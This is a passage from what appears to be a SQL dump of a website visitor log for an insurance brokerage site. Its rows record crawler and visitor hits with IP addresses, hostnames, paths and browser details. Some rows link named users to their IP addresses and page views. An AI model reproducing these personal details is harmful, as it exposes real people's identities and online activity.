(http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13397,'0b_6f743fe774d0143ef129d763344d90c6','1459884395','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/about-us/meet-the-eib-team/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13400,'0b_6f743fe774d0143ef129d763344d90c6','1459884396','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/meet-the-eib-team/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13401,'0b_6f743fe774d0143ef129d763344d90c6','1459884397','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13403,'0b_6f743fe774d0143ef129d763344d90c6','1459884398','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/agent-tools/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13404,'0b_6f743fe774d0143ef129d763344d90c6','1459884398','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/register/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13406,'0b_6f743fe774d0143ef129d763344d90c6','1459884399','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/insentives/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13407,'0b_6f743fe774d0143ef129d763344d90c6','1459884399','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/licensing-contracting/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13409,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884400','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13410,'0b_6f743fe774d0143ef129d763344d90c6','1459884400','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/carriers/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13412,'0b_6f743fe774d0143ef129d763344d90c6','1459884401','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/contact/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13413,'0b_6f743fe774d0143ef129d763344d90c6','1459884401','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-status/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13415,'0b_6f743fe774d0143ef129d763344d90c6','1459884402','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/igo/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13418,'0b_6f743fe774d0143ef129d763344d90c6','1459884403','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/term-quotes/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13419,'0b_6f743fe774d0143ef129d763344d90c6','1459884403','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13421,'0b_6f743fe774d0143ef129d763344d90c6','1459884404','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13424,'0b_6f743fe774d0143ef129d763344d90c6','1459884405','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13425,'0b_6f743fe774d0143ef129d763344d90c6','1459884405','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13427,'0b_6f743fe774d0143ef129d763344d90c6','1459884406','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/aig-releases-new-term-rates-and-re-enters-ny/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13428,'0b_6f743fe774d0143ef129d763344d90c6','1459884406','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13430,'0b_6f743fe774d0143ef129d763344d90c6','1459884407','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/meet-the-eib-team/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13433,'0b_6f743fe774d0143ef129d763344d90c6','1459884408','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/meet-the-eib-team/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13434,'0b_6f743fe774d0143ef129d763344d90c6','1459884408','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/?page_id=171?a=pwdreset','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13437,'0b_6f743fe774d0143ef129d763344d90c6','1459884409','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/?page_id=169','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13440,'0b_6f743fe774d0143ef129d763344d90c6','1459884409','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/register/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13442,'0b_6f743fe774d0143ef129d763344d90c6','1459884410','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/agent-tools/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13443,'0b_6f743fe774d0143ef129d763344d90c6','1459884410','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/agent-tools/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13445,'0b_6f743fe774d0143ef129d763344d90c6','1459884411','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/register/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13448,'0b_6f743fe774d0143ef129d763344d90c6','1459884412','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/register/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13449,'0b_6f743fe774d0143ef129d763344d90c6','1459884412','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/insentives/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13451,'0b_6f743fe774d0143ef129d763344d90c6','1459884413','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/insentives/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13452,'0b_6f743fe774d0143ef129d763344d90c6','1459884414','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/licensing-contracting/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13455,'0b_6f743fe774d0143ef129d763344d90c6','1459884414','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/licensing-contracting/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13458,'0b_6f743fe774d0143ef129d763344d90c6','1459884415','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/carriers/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13461,'0b_6f743fe774d0143ef129d763344d90c6','1459884415','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/carriers/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13463,'0b_6f743fe774d0143ef129d763344d90c6','1459884416','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/contact/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13464,'0b_6f743fe774d0143ef129d763344d90c6','1459884417','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/contact/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13466,'0b_6f743fe774d0143ef129d763344d90c6','1459884417','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-status/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13469,'0b_6f743fe774d0143ef129d763344d90c6','1459884418','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-status/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13470,'0b_6f743fe774d0143ef129d763344d90c6','1459884418','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/igo/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13473,'0b_6f743fe774d0143ef129d763344d90c6','1459884419','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/igo/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13476,'0b_6f743fe774d0143ef129d763344d90c6','1459884420','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/term-quotes/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13478,'0b_6f743fe774d0143ef129d763344d90c6','1459884420','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/term-quotes/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13481,'0b_6f743fe774d0143ef129d763344d90c6','1459884421','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13482,'0b_6f743fe774d0143ef129d763344d90c6','1459884422','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13485,'0b_6f743fe774d0143ef129d763344d90c6','1459884423','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13487,'0b_6f743fe774d0143ef129d763344d90c6','1459884423','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13490,'0b_6f743fe774d0143ef129d763344d90c6','1459884424','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/aig-releases-new-term-rates-and-re-enters-ny/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13491,'0b_6f743fe774d0143ef129d763344d90c6','1459884425','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/aig-releases-new-term-rates-and-re-enters-ny/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13493,'0b_6f743fe774d0143ef129d763344d90c6','1459884425','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13494,'0b_6f743fe774d0143ef129d763344d90c6','1459884426','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13496,'0b_6f743fe774d0143ef129d763344d90c6','1459884426','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/members/','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13499,'0b_6f743fe774d0143ef129d763344d90c6','1459884427','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/members/data-slide=prev','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13500,'0b_6f743fe774d0143ef129d763344d90c6','1459884428','173.193.219.168','173.193.219.168-static.reverse.uk2group.com','/members/data-slide=next','Aboundex/0.3 (http://www.aboundex.com/crawler/)','','',0,'','','','','','Aboundex','','','','3','0',0),(13503,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459884550','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(13505,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459884551','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(13508,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459884564','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','51',0),(13511,'0b_0843fb7c9ef735e734d2357a7c90da89','1459884957','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13512,'0b_0843fb7c9ef735e734d2357a7c90da89','1459885341','24.146.252.22','ool-1892fc16.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13514,'0b_0843fb7c9ef735e734d2357a7c90da89','1459885341','24.146.252.22','ool-1892fc16.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13515,'0b_0843fb7c9ef735e734d2357a7c90da89','1459885342','24.146.252.22','ool-1892fc16.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13518,'0b_0843fb7c9ef735e734d2357a7c90da89','1459885354','24.146.252.22','ool-1892fc16.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13520,'0b_0843fb7c9ef735e734d2357a7c90da89','1459885389','24.146.252.22','ool-1892fc16.dyn.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(13523,'0b_86c85206b03b35c6d5bd789484946424','1459885574','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13526,'0b_86c85206b03b35c6d5bd789484946424','1459885575','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13529,'0b_86c85206b03b35c6d5bd789484946424','1459885577','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13530,'0b_86c85206b03b35c6d5bd789484946424','1459885577','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13532,'0b_f0c2cf213a986b1b531c2c8c9489c43d','1459886582','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(13535,'0b_86c85206b03b35c6d5bd789484946424','1459887019','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(13538,'0b_86c85206b03b35c6d5bd789484946424','1459887020','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13541,'0b_38ab01bf5d0fab5de4ee987e98fee34a','1459887221','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=218','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(13542,'0b_6501cc892599e3bb29e9b198a30790cc','1459887261','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13544,'0b_6501cc892599e3bb29e9b198a30790cc','1459887262','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13547,'0b_86c85206b03b35c6d5bd789484946424','1459887501','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(13548,'0b_86c85206b03b35c6d5bd789484946424','1459887502','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13551,'0b_86c85206b03b35c6d5bd789484946424','1459887948','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(13553,'0b_86c85206b03b35c6d5bd789484946424','1459887949','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13554,'0b_9c637d91499279367275e329dd772549','1459887965','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(13557,'0b_9c637d91499279367275e329dd772549','1459887968','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(13560,'0b_9c637d91499279367275e329dd772549','1459887976','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(13563,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459888497','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','51',0),(13566,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459888498','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(13568,'0b_08bfffc4a831cae3d13fca8ba8f41bba','1459888505','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','51',0),(13569,'0b_86ba64f2bfd08ef3c3320a9a352928a1','1459888610','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13571,'0b_54c4748e33e9757b4817fe24990f6ecc','1459889428','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(13572,'0b_54c4748e33e9757b4817fe24990f6ecc','1459889428','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(13575,'0b_54c4748e33e9757b4817fe24990f6ecc','1459889429','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(13578,'0b_54c4748e33e9757b4817fe24990f6ecc','1459889435','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(13580,'0b_54c4748e33e9757b4817fe24990f6ecc','1459889445','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(13581,'0b_1d3daf4ecdd4eb6b1ab446c1d8151d5c','1459889918','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13583,'0b_1d3daf4ecdd4eb6b1ab446c1d8151d5c','1459889919','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13586,'0b_725c5d1f9e1d1d7e34d39a37316057c8','1459889956','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(13587,'0b_af3c41ec859d611b09cb0ea34cd34b02','1459890409','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(13590,'0b_ebb29231a11c1daaee0f2e0b38827602','1459891694','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13592,'0b_bf9309de0a648e52f140d8486ad8414e','1459892581','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(13593,'0b_6f01079c6037bd54512a7b6a45aa1c69','1459892584','65.55.210.17','msnbot-65-55-210-17.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(13595,'0b_3d416d1d0079b0046e8cb2db32d3d0cb','1459893232','180.76.15.160','baiduspider-180-76-15-160.crawl.baidu.com','/case-status/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(13598,'0b_b21a700110cb085cef3cda66a91a0007','1459895600','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','','',0,'Win10','Google Chrome','','','','','','','','0','0',0),(13601,'0b_67f55e9612628b29e0033f90847a4453','1459896752','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; 